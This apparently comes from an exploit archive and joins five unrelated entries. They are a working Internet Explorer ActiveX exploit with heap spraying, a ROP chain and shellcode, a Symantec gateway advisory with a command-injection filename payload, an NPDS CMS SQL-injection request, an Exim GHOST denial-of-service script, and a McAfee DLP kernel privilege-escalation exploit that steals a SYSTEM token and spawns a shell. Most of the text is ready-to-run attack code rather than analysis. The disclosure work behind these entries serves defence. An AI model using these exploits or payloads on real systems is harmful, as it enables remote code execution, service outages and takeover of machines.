md5sum: f9f2d32ae0e4d7b5c19692d0753451fb
Class VideoPlayer
GUID: {4B3476C6-185A-4D19-BB09-718B565FA67B}
Number of Interfaces: 1
Default Interface: _DVideoPlayer
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
* NOTES *
#########
*) When passing an overlong string to the ActiveX object's "SetText" method, a
buffer overflow in the data section occurs. It allows overwriting a subsequent
pointer that can be used in a controlled memcpy when dispatching the object's
"SetFontName" method. With this arbitrary write, array structures can be
manipulated to gain access to complete process memory. Equipped with this
capability, necessary information can be leaked and manipulated to execute
arbitrary code remotely.
*) Comment in the alert messages to see some leaks ;)
*) This is PoC Code: If it does not work for you, clear IE's history and try
again. Tested against mshtml.dll and jscript9.dll version 10.0.9200.17183
*) Inspired by:
"http://blog.exodusintel.com/2013/12/09/a-browser-is-only-as-strong-as-its-weakest-byte-part-2/"
"http://ifsec.blogspot.de/2013/11/exploiting-internet-explorer-11-64-bit.html"
"https://cansecwest.com/slides/2014/The Art of Leaks - read version - Yoyo.pdf"
"https://cansecwest.com/slides/2014/ROPs_are_for_the_99_CanSecWest_2014.pdf"
"https://github.com/exp-sky/HitCon-2014-IE-11-0day-Windows-8.1-Exploit/blob/master/IE 11 0day & Windows 8.1 Exploit.pdf"
-->
<html>
<body>
<button onclick=run()>runme</button>
<script>
function run(){
/* VideoPlayer.ocx image has the rebase flag set =>
It's mapped to another base per process run */
/* create its vulnerable ActiveX object (as HTMLObjectElement) */
var obj = document.createElement("object");
obj.setAttribute("classid", "clsid:4B3476C6-185A-4D19-BB09-718B565FA67B");
/* amount of arrays to create on the heap */
nrArrays = 0x1000
/* size of data in one array block: 0xefe0 bytes =>
subract array header (0x20) and space for typed array headers (0x1000)
from 0x10000 */
arrSize = (0x10000-0x20-0x1000)/4
/* heap array container will hold our heap sprayed data */
arr = new Array(nrArrays)
/* use one buffer for all typed arrays */
intArrBuf = new ArrayBuffer(4)
/* spray the heap with array data blocks and subsequent typed array headers
of type Uint32Array */
k = 0
while(k < nrArrays){
/* create "jscript9!Js::JavascriptArray" with blocksize 0xf000 (data
aligned at 0xXXXX0020) */
arr[k] = new Array(arrSize);
/* fill remaining page (0x1000) after array data with headers of
"jscript9!Js::TypedArray<unsigned int>" (0x55 * 0x30 = 0xff0) as a
typed array header has the size of 0x30. 0x10 bytes are left empty */
for(var i= 0; i<0x55; i++){
/* headers become aligned @ 0xXXXXf000, 0xXXXXf030, 0xXXXXf060,.. */
arr[k][i] = new Uint32Array(intArrBuf, 0, 1);
}
/* tag the array's last element */
arr[k][arrSize - 1] = 0x12121212
k += 1;
}
/* perform controlled memwrite to 0x1111f010: typed array header is at
0x1111f000 to 0x1111f030 => overwrite array data header @ 11111f010 with
0x00000001 0x00000004 0x00000040 0x1111f030 0x00
The first 3 dwords are sideeffects due to the code we abuse for the
controlled memcpy */
addr = 0x1111f010 // WHERE TO WRITE
/* prepare buffer with address we want to write to */
ptrBuf = ""
/* fill buffer: length = relative pointer address - buffer start + pointer
offset */
while (ptrBuf.length < (0x92068 - 0x916a8 + 0xC)){ptrBuf += "A"}
ptrBuf += dword2str(addr)
/* trigger: overflow buffer and overwrite the pointer value after buffer */
obj.SetText(ptrBuf,0,0)
//alert("buffer overflown => check PTR @ videop_1+92068: dc videop_1+92068")
/* use overwritten pointer after buffer with method "SetFontName" to conduct
memory write. We overwrite a typed array's header length to 0x40 and let
its buffer point to the next typed array header at 0x1111f030 (see above)
*/
obj.SetFontName(dword2str(addr+0x20)) // WHAT TO WRITE
/* find the corrupted Uint32Array (typed array) */
k = 0
arrCorrupt = 0
while(k < 0x1000-1){
for(var i = 0; i < 0x55-1; i++){
if(arr[k][i][0] != 0){
// address of jscript9!Js::TypedArray<unsigned int>::`vftable'
//alert("0x" + arr[k][i][0].toString(16))
arrCorrupt = 1
break
}
}
if (arrCorrupt == 1) break
k++
}
if (!arrCorrupt){
alert("cannot find corrupted Uint32Array")
return -1
}
/* modify subsequent Uint32Array to be able to RW all process memory */
arr[k][i][6] = 0x7fffffff // next Uint32Array length
arr[k][i][7] = 0 // set buffer of next Uint32Array to start of process mem
/* our memory READWRITE interface :) */
mem = arr[k][i+1]
//alert(mem.length.toString(16))
if (mem.length != 0x7fffffff){
alert("Cannot change Uint32Array length")
return -2
}
/* now we could even repair the change we did with memcpy ... */
/* leak several pointers and calculate VideoPlayer.ocx base */
arr[k+1][0] = obj // set HTMLObjectElement as first element
//alert(mem[0x11120020/4].toString(16))
arrayElemPtr = mem[(addr + 0x1010)/4] // leak array elem. @ 0x11120020 (obj)
objPtr = mem[arrayElemPtr/4 + 6] // deref array elem. + 0x18
heapPtrVideoplayer = mem[objPtr/4 + 25] // deref HTMLObjectElement + 0x64
/* deref heap pointer containing VideoPlayer.ocx pointer */
videoplayerPtr = mem[heapPtrVideoplayer/4]
base = videoplayerPtr - 0x6b3b0 // calculate base
/* check if we have the image of VideoPlayer.ocx
check for MZ9000 header and "Vide" string at offset 0x6a000 */
if (mem[base/4] != 0x905a4d ||
mem[(base+0x6a000)/4] != 0x65646956){
alert("Cannot find VideoPlayer.ocx base or its version is wrong")
return -3
}
//alert(base.toString(16))
/* get VirtualAlloc from imports of VideoPlayer.ocx */
virtualAlloc = mem[(base + 0x69174)/4]
/* memcpy is available inside VideoPlayer.ocx */
memcpy = base + 0x15070
//alert("0x" + virtualAlloc.toString(16) + " " + 0x" + memcpy.toString(16))
/* create shellcode (./msfvenom -p windows/exec cmd=calc) */
sc = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"+
"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"+
"\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"+
"\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"+
"\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0"+
"\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b"+
"\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"+
"\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"+
"\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"+
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"+
"\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b"+
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd"+
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"+
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"+
"\x00"
scBuf = new Uint8Array(sc.length)
for (n=0; n<sc.length; n++){
scBuf[n] = sc.charCodeAt(n)
}
/* leak shellcode address */
arr[k+1][0] = scBuf
/* therefore, leak array element at 0x11120020 (typed array header of
Uint8Array containing shellcode) ... */
elemPtr = mem[(addr + 0x1010)/4]
/* ...and deref array element + 0x1c (=> leak shellcode's buffer address) */
scAddr = mem[(elemPtr/4) + 7]
//alert(scAddr.toString(16))
/* create and leak rop buffer */
rop = new Uint32Array(0x1000)
arr[k+1][0] = rop
/* leak array element at 0x11120020 (typed array header) */
elemPtr = mem[(addr + 0x1010)/4]
/* deref array element + 0x1c (leak rop's buffer address) */
pAddr = mem[(elemPtr/4) + 7] // payload address
/* ROP chain (rets in comments are omitted) */
/* we perform:
(void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
memcpy(EAX, shellcode, shellcodeLen)
(void(*)())EAX() */
offs = 0x30/4 // offset to chain after CALL [EAX+0x30]
rop[0] = base + 0x1ff6 // ADD ESP, 0x30;
rop[offs + 0x0] = base + 0x1ea1e // XCHG EAX, ESP; <-- first gadget called
rop[offs + 0x1] = virtualAlloc // allocate RWX mem (address avail. in EAX)
rop[offs + 0x2] = base + 0x10e9 // POP ECX; => pop the value at offs + 0x7
rop[offs + 0x3] = 0 // lpAddress
rop[offs + 0x4] = 0x1000 // dwSize (0x1000)
rop[offs + 0x5] = 0x1000 // flAllocationType (MEM_COMMIT)
rop[offs + 0x6] = 0x40 // flProtect (PAGE_EXECUTE_READWRITE)
rop[offs + 0x7] = pAddr + (offs+0xe)*4 // points to memcpy's dst param (*2)
rop[offs + 0x8] = base + 0x1c743 // MOV [ECX], EAX; => set dst to RWX mem
rop[offs + 0x9] = base + 0x10e9 // POP ECX;
rop[offs + 0xa] = pAddr + (offs+0xd)*4 // points to (*1) in chain
rop[offs + 0xb] = base + 0x1c743 // MOV [ECX], EAX; => set return to RWX mem
rop[offs + 0xc] = memcpy
rop[offs + 0xd] = 0xffffffff // (*1): ret addr to RWX mem filled at runtime
rop[offs + 0xe] = 0xffffffff // (*2): dst for memcpy filled at runtime
rop[offs + 0xf] = scAddr // shellcode src addr to copy to RWX mem (param2)
rop[offs + 0x10] = sc.length // length of shellcode (param3)
/* manipulate object data to gain EIP control with "Play" method */
videopObj = mem[objPtr/4 + 26]
mem[(videopObj-0x10)/4] = pAddr // pAddr will be used in EAX in below call
/* eip control @ VideoPlayer.ocx + 0x6643B: CALL DWORD PTR [EAX+0x30] */
obj.Play()
}
/* dword to little endian string */
function dword2str(dword){
str = ""
for (n=0; n<4; n++){
str += String.fromCharCode((dword >> 8*n) & 0xff)
}
return str
}
//setTimeout(run(), 3000);
</script>
</body>
</html>
Vantage Point Security Advisory 2014-007
========================================
Title: Symantec Encryption Management Server - Remote Command Injection
ID: VP-2014-007
Vendor: Symantec
Affected Product: Symantec Encryption Gateway
Affected Versions: < 3.2.0 MP6
Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/
Author: Paul Craig <paul[at]vantagepoint[dot]sg
Summary:
---------
Symantec Gateway Email Encryption provides centrally managed email encryption
to secure email communications with customers and partners regardless of whether
or not recipients have their own email encryption software.
With Gateway Email Encryption, organizations can minimize the risk of
a data breach while complying with regulatory mandates for information
security and privacy.
Details:
---------
Remote Command Injection vulnerabilities occur when user supplied
input is used directly as a command line argument to a fork(), execv()
or a CreateProcessA() function.
It was found that the binary /usr/bin/pgpsysconf calls the binary
/usr/bin/pgpbackup with unfiltered user supplied input when restoring
a Database Backup from the Symantec Encryption Management Web
Interface .
The user supplied 'filename' value is used directly as a command
argument, and can be concatenated to include additional commands with
the use of the pipe character.
This can allow a lower privileged Administrator to compromise the
Encryption Management Server.
This is demonstrated below in a snippet from pgpsysconf;
.text:08058FEA mov dword ptr [ebx], offset
aUsrBinPgpbacku ; "/usr/bin/pgpbackup"
.text:08058FF0 cmp [ebp+var_1D], 0
.text:08058FF4 jnz short loc_8059049
.text:08058FF6 mov ecx, 4
.text:08058FFB mov edx, 8
.text:08059000 mov eax, 0Ch
.text:08059005 mov dword ptr [ebx+ecx], offset unk_807AE50
.text:0805900C mov [ebx+edx], esi
.text:0805900F mov dword ptr [ebx+eax], 0
.text:08059016 call _fork ; Bingo..
An example to exploit this vulnerability and run the ping command can
be seen below.
POST /omc/uploadBackup.event ....
....
Content-Disposition: form-data; name="file";
filename="test123|`ping`|-whatever.tar.gz.pgp"
This vulnerability can be further exploited to gain local root access
by calling the setuid binary pgpsysconf to install a local package
file.
Fix Information:
---------
Upgrade to Symantec Encryption Management Server 3.3.2 MP7.
See http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150129_00
for more information
Timeline:
---------
2014/11/26: Issue Reported.
2015/01/30: Patch Released.
About Vantage Point Security:
---------
Vantage Point Security is the leading provider for penetration testing
and security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.
Web: https://www.vantagepoint.sg/
Contact: office[at]vantagepoint[dot]sg
Title - NPDS CMS Revolution-13 - SQL Injection Vulnerability
Credits & Author:
Narendra Bhati ( R00t Sh3ll )
www.websecgeeks.com
References (Source):
====================
http://www.npds.org/viewtopic.php?topic=26233&forum=12
http://websecgeeks.com/npds-cms-sql-injection/
Release Date:
=============
24-01-2015
CVE ID :
====================================
CVE-2015-1400
Product & Service Introduction:
===============================
http://www.npds.org/
Abstract Advisory Information:
==============================
Narendra Bhati ( R00t Sh3ll ) An Information Security Analyst In Pune ( India ) discovered a remote sql injection vulnerability in the NPDS CMS .
Vulnerability Disclosure Timeline:
==================================
25-01-2015 : Public Disclosure
Timeline Status:
=================
Reported To Vendor 14-12-2014
Verified By Vendor 15-12-2014
Acknowledge By Vendor 14-01-2015
Public Disclosure By Vendor 24-01-2015
Technical Disclosure 25-01-2015
Vendor Security Advisory http://www.npds.org/viewtopic.php?topic=26233&forum=12
Technical Disclosure - http://websecgeeks.com/npds-cms-sql-injection/
CVE-2015-1400
Mitigation For This Vulnerability There Is No Update By Vendor , But That Will Be Out Soon !
Affected Product(s):
====================
NPDS-Revolution-13
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A sql injection web vulnerability has been discovered in the NPDS CMS - NPDS-Revolution-13.
The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms.
The sql injection vulnerability is located in the `query` parameter of the vulnerable `search.php ` application file. Remote attackers
are able to inject own sql commands by usage of vulnerable `search.php ` file. A successful attack requires to
manipulate a POST method request with vulnerable parameter `query` value to inject own sql commands. The injection is a time based ( tested ) by sql injection
that allows to compromise the web-application and connected dbms.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] NPDS-Revolution-13
Vulnerable File(s):
[+] search.php
Vulnerable Parameter(s):
[+] query
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account.
For reproduce the security vulnerability follow the provided information and steps below to continue.
HTTP Request
##### ==========
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: cookievalue
Connection: keep-alive
content-type:! application/x-www-form-urlencoded
Content-Length: 63
query=")and benchmark(20000000,sha1(1))-
====================================
Reference(s):
http://www.npds.org/viewtopic.php?topic=26233&forum=12
http://websecgeeks.com/npds-cms-sql-injection/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerability `query` parameter value in the search.php file.
Use a prepared statement to fix the issues fully and setup own exception that prevents sql injection attacks.
Security Risk:
==============
The security risk of the remote sql injection web vulnerability as critical
Credits & Author:
==================
Narendra Bhati ( R00t Sh3ll )
www.websecgeeks.com
# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit]
# Date: [1/29/2015]
# Exploit Author: [1N3]
# Vendor Homepage: [www.exim.org]
# Version: [4.80 or less]
# Tested on: [debian-7-7-64b]
# CVE : [2015-0235]
#!/usr/bin/python
# Exim ESMTP DoS Exploit by 1N3 v20150128
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
# http://crowdshield.com
#
# USAGE: python ghost-smtp-dos.py <ip> <port>
#
# Escape character is '^]'.
# 220 debian-7-7-64b ESMTP Exim 4.80 ...
# HELO
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
# Connection closed by foreign host.
#
# user () debian-7-7-64b:~$ dmesg
# ...
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
# libc-2.13.so[7fabef2a2000+182000]
import socket
import time
import sys, getopt
def main(argv):
argc = len(argv)
if argc <= 1:
print "usage: %s <host>" % (argv[0])
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
target = argv[1] # SET TARGET
port = argv[2] # SET PORT
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,int(port)))
data = s.recv(1024)
print "CONNECTION: " +data
s.send('HELO ' + buffer + '\r\n')
data = s.recv(1024)
print "received: " +data
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
print "received: " +data
s.close()
main(sys.argv)
/*
Exploit Title - McAfee Data Loss Prevention Endpoint Arbitrary Write Privilege Escalation
Date - 29th January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.mcafee.com
Tested Version - 9.3.200.23
Driver Version - 9.3.200.23 - hdlpctrl.sys
Tested on OS - 32bit Windows XP SP3 and Windows 2003 Server SP2
OSVDB - http://www.osvdb.org/show/osvdb/117345
CVE ID - CVE-2015-1305
Vendor fix url - https://kc.mcafee.com/corporate/index?page=content&id=SB10097
Fixed version - 9.3.400
Fixed driver ver -
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows Server 2003
#define W2K3_KPROCESS 0x38 // Offset to _KPROCESS from a _ETHREAD struct
#define W2K3_TOKEN 0xd8 // Offset to TOKEN from the _EPROCESS struct
#define W2K3_UPID 0x94 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W2K3_APLINKS 0x98 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8
};
BYTE token_steal_w2k3[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W2K3_KPROCESS, // mov eax, [eax+W2K3_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W2K3_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W2K3_TOKEN] Retrieves TOKEN
0x8b,0x80,W2K3_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W2K3_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W2K3_APLINKS,0x00,0x00,0x00, // sub eax, W2K3_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W2K3_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+W2K3_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W2K3_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov [eax+W2K3_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
LPVOID input[1] = {0};
LPVOID addrtoshell;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf("McAfee Data Loss Prevention Endpoint (hdlpctrl.sys) Arbitrary Write EoP Exploit\n");
printf(" Tested on Windows XP SP3/Windows Server 2003 SP2 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 3)
{
printf("[i] Running Windows Server 2003\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "devbkctrl");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
memset(addrtoshell, 0x90, BUFSIZE);
if (GetWindowsVersion() == 1)
{
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
if (GetWindowsVersion() == 3)
{
memcpy(addrtoshell, token_steal_w2k3, sizeof(token_steal_w2k3));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w2k3));
}
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
printf("[+] Input buffer contents %08x\n", input[0]);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x00224014, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
return 0;
}